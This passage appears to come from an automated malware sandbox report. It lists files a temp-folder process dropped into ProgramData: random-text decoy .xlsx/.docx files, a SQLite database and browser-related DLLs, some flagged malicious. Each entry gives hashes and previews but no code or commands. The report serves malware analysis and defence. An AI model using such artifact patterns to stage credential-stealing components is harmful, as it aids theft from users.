Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\ProgramData\GNLQNHOLWB.xlsx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698695541849584
Encrypted:	false
SSDEEP:	24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
MD5:	64E7020B0B401F75D3061A1917D99E04
SHA1:	785E09A2F76464E26CE282F41DE07D1B27FFB855
SHA-256:	9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
SHA-512:	14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
Malicious:	false
Reputation:	unknown
Preview:	GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

C:\ProgramData\IPKGELNTQY.xlsx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Reputation:	unknown
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\JKKECBGIIIEBGCBGIDHDGCAKJE

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LSBIHQFDVT.xlsx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Reputation:	unknown
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\ProgramData\MXPXCVPDVN.docx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Reputation:	unknown
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\ProgramData\MXPXCVPDVN.xlsx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Reputation:	unknown
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\ProgramData\QNCYCDFIJJ.docx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Reputation:	unknown
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\SFPUSAFIOL.docx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Reputation:	unknown
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\UOOJJOZIRH.docx

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Reputation:	unknown
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\ProgramData\freebl3.dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Process:	C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

